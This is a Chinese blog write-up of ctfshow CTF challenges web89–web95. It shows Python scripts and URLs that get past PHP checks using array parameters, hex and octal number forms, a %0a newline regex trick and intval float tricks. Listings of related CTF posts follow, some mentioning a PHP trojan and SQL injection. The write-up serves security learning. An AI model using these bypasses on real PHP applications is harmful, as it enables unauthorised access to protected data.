ctfshow web89-web95

已于 2025-03-11 16:29:34 修改
阅读量278 收藏 2
点赞数 11
CC 4.0 BY-SA版权
分类专栏: ctf 文章标签: 笔记
于 2025-03-11 16:28:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45587677/article/details/135395003

web 89

数组绕过

import requests

url = "http://5f87330e-11a0-42ed-9e1d-a249303bcd28.challenge.ctf.show/"

# 使用数组绕过
payloads = [
    {"num[]": "a"},       # 数组形式
    {"num": []},          # 空数组
    {"num[a]": "b"},      # 关联数组
    {"num": {}},          # 空对象
    {"num[]": "true"},    # 布尔数组
]

for payload in payloads:
    response = requests.get(url, params=payload)
    print(f"Testing payload: {payload}")
    print(f"Response: {response.text}")
    if "ctfshow{" in response.text:
        print(f"Found flag with payload: {payload}")
        print(f"Flag: {response.text}")
        break

web 89

import requests

url = "http://362cbf68-ac9a-4989-ac3e-cfc2c678804e.challenge.ctf.show/"

payloads = [
    "0x117c",          # 十六进制: 4476
    "010574",          # 八进制: 4476
    "4476e0",          # 科学计数法
    "4476.0",          # 浮点数
    "0b1000101111100"  # 二进制: 4476
]

for payload in payloads:
    params = {"num": payload}
    response = requests.get(url, params=params)
    print(f"Testing payload: {payload}")
    print(f"Response: {response.text}")
    if "ctfshow{" in response.text:
        print(f"Found flag with payload: {payload}")
        print(f"Flag: {response.text}")
        break

#https://362cbf68-ac9a-4989-ac3e-cfc2c678804e.challenge.ctf.show/?num=0x117c

web90

https://785b5349-56a9-4159-a1db-ce8078f10cde.challenge.ctf.show/?cmd=php%0aflag
$a=$_GET['cmd'];                      // 从 GET 请求获取 cmd 参数
if(preg_match('/^php$/im', $a)){      // 第一个正则匹配
    if(preg_match('/^php$/i', $a)){   // 第二个正则匹配
        echo 'hacker';                // 如果两个都匹配,输出 'hacker'
    }
    else{
        echo $flag;                   // 如果只匹配第一个,输出 flag
    }
}
else{
    echo 'nonononono';               // 如果第一个都不匹配,输出 'nonononono'
}

根据代码的介绍值要第一个匹配就可以实现绕过

但是\n 是不行的 php\nflag 回显是nononono

后面看到一篇文章引用

https://blog.csdn.net/qq_46091464/article/details/108278486

这里介绍了\n等于%0a

  1. 可以绕过

 web 92

弱类型比较

因为有

if(intval($num,0)==4476){

存在所以我们只要在后面加一个.1

为啥不用.0

  • 4476.0 在弱类型比较时会被视为等于 4476
  • 4476.1 在弱类型比较时不等于 4476,但 intval() 后等于 4476

 web93

和web92一样的

31980361-a06f-4938-b584-5864c25f92c0.challenge.ctf.show/?num=4476.1

直接获得了flag

 web94

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){                 // 条件1:不能严格等于"4476"
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){  // 条件2:不能包含字母
        die("no no no!");
    }
    if(!strpos($num, "0")){            // 条件3:必须包含字符"0"
        die("no no no!");
    }
    if(intval($num,0)===4476){         // 条件4:转换后必须严格等于4476
        echo $flag;
    }
}

通过代码分析我们可以直到这次是要有0存在的

我们只要在上一题的4476.1后面加一个0

poc

https://d23de3d3-6f96-4d7a-b3c8-0a5a35cfa110.challenge.ctf.show/?num=4476.10

 web95

可以通过+号进行过绕过

  • PHP 的数字解析规则:
  • 当字符串以 0 开头时,PHP 会将其视为八进制数
  • 但如果这个字符串是一个纯数字字符串,可能会被当作十进制处理
https://46581d3b-d8df-4c5d-bb57-59f63019baf3.challenge.ctf.show/?num=+010574
CTFSHOW web 89-100
m0_73605862的博客
02-12 1431
不知道为什么网上的wp都没有解释一个事情。就是num=[“abc”]和num[]="abc的区别。(这个地方主要是自己最开始也知道要传一个不含有数字的空的字符串去,但是后面发现其实不对。然后弄了很久才发现原来是url解析的问题。这里将讲解一下url对他们的解析的微妙的区别。URL解析差异!!!!!!!!!
2024年网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 688
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
Ctfshow web入门 PHP特性篇 web89-web151 全
Jay17的博客
07-10 2434
Ctfshow web入门 PHP特性篇 web89-web151 全 web入门 PHP特性篇的wp都一把梭哈在这里啦~ 有点多,师傅们可以收藏下来慢慢看,写的应该挺全面的叭..... 有错误敬请斧正!
ctfshow--web入门(web89-100)
qing_chuan_的博客
06-03 486
else {} }highlight_file()函数:将文本信息高亮显示,识别里面的关键字,然后加入css的一个样式,混合起来进行输出要传入一个u弱类型比较与flag.php,要绕过,可以在前面加入一些,文件路径(var/www/html),绝对路径(./)playload :?u = / var / www / html / flag . php或者?
CTFshow_php特性_Web89~Web150
dasdasdasvsdV的博客
08-16 862
作为thinkphp,phpCVE的前置关卡,本章节还是比较重要的,师傅们冲冲冲~
ctfshow php特性 web89-94
weixin_58519918的博客
04-19 2845
web89)【preg_match】 https://blog.51cto.com/lxw1844912514/3107686函数intval如果参数是字符串,则返回字符串中第一个不是数字的字符之前的数字串所代表的整数值。 preg_match函数表示运用正则来使用匹配函数。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer(整数) 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
2024年网安最全ctfshow-WEB-web3_ctfshow web3
2401_84264610的博客
05-01 232
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的include()函数通过GET请求接收一个url参数,那接下来我们就给它传递一个url参数。我们直接在url地址栏中拼接url参数,访问crf_go_go_go文件。很明显这个crf_go_go_go文件就是存放flag的文件。
ctfshow-WEB-web2_ctf
2401_84297618的博客
04-28 649
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
ctfshow php特性 web89-web150
qq_60954344的博客
04-24 529
php特性这个东西很杂,覆盖的内容也很多,都是一些零碎的知识点,这次正好借这个刷题的机会,做一个小复习。
ctfshow-web入门-php特性(web89-web95)intval 函数绕过
Welcome To Myon'Blog !
07-12 1355
如果第一次匹配成功,再次使用正则表达式匹配 $a 是否等于字符串“php”,但这次只有不区分大小写,是单行模式,不会匹配多行,如果第二次没有匹配成功就会输出 flag。也就是说,如果 num 中不包含数字 "0" 就会终止程序,但是还有一种情况,如果这个 0 出现在开头,虽然是找到了有 0 这个字符,但是返回位置为 0 ,if (!== 是相等运算符,在进行比较时,会先将字符串类型转化成相同,再比较,比如比较一个数字和字符串或者比较涉及到数字内容的字符串,字符串会被转换成数值并按照数值来进行比较。
CTFshow web(php特性89-92)
csjjjd的博客
02-02 973
if(preg_match('/^php$/im', $a)){这里的意思就是只要识别到php无论大小写都可以,而m的意思是可以多行识别, if(preg_match('/^php$/i', $a)){这里没有m,不能多行识别,所以给前面加个%0a(换行符)就拿到flag。num=+4476或者?
ctfshow php特性 web 89~150plus
shinygod的博客
03-07 871
目录web 92web 93web 94web 95web 96web 97web 98web 99web 100web 101web 102web 103web 104 web 92 num=0x117c intval($num,$base=0) //当base为0时,会自动检测num的进制 //例如:0x117c(16进制) == 4476(十进制) == 010574(8进制) web 93 在这里插入代码片 web 94 web 95 web 96 web 97 web 98 web 99 w
CTFSHOW-WEB入门-PHP特性89-100
2301_80024722的博客
02-05 937
显示为true,那么这里就可以讲一段PHP代码写入文件,文件名选择可以满足条件的1-877均可,这里选择出现频率高的,比如1,2这样的,这里选择2:并且写入php木马,访问让其执行。由于第一个有m,那就说明是匹配的是每一行的开头和结尾,有一行满足即可而不是字符串的开头和结尾。这个字符串,但是不进行赋值操作,后两句同样的道理,只不过是判断有没有。也就是让两个数组指向同一个地址,如果为空的话,就返回。确定这个参数的值是否在之前填充的。对应的数组是否为空,不为空的话,将。的参数,并且该参数的值是否在。
CTFSHOW WEB89-100 PHP特性 详解
qq_49399033的博客
06-14 9509
CTFSHOW PHP特性做题笔记 详细学习
CTFshow-web入门-php-web89-150
m0_72655585的博客
07-17 1670
也就是说,当给intval()函数传入一个非空的数组时,intval()函数将会返回1,结合我们preg_match()传入数组返回false的特性,这道题的payload就很清楚了。在php中变量名只有数字字母下划线,被get或者post传入的变量名,如果含有空格、+、[则会被转化为_,所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.),但php中有个特性就是如果传入[,它被转化为_之后,后面的字符就会被保留下来不会被替换。system(‘FLASE’),空指令,失败返回FLASE。
CTFSHOW WEB入门 php特性 web89-
sinat_41572027的博客
07-11 501
CTFSHOW WEB入门 php特性 web89-100
CTFshowweb89~web96---php特性(1)
金 帛的博客
06-07 841
CTFshow(PHP特性)web89web96的wp
web入门php特性web89—104(ctfshow
2401_82985722的博客
08-17 829
if(intval($num,0)===4476){ base=0,所以会对num的格式进行检测。因为匹配的时候 先匹配换行符前面的,接着匹配换行符后面的,两个都是abc所以可以通过正则表达式。第一个参数 callback 是被调用的回调函数(一般为闭包函数),其余参数是回调函数的参数。
ctfshow web1-20
最新发布
04-01
### CTFShow Web 1 至 20 关解题思路 以下是关于 CTFShow 平台上 Web 类第 1 到 20 关的部分解题思路和相关信息: #### Web 1 通过分析 URL 参数 `id` 的传递方式,可以发现其存在 SQL 注入漏洞。尝试输入特殊字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值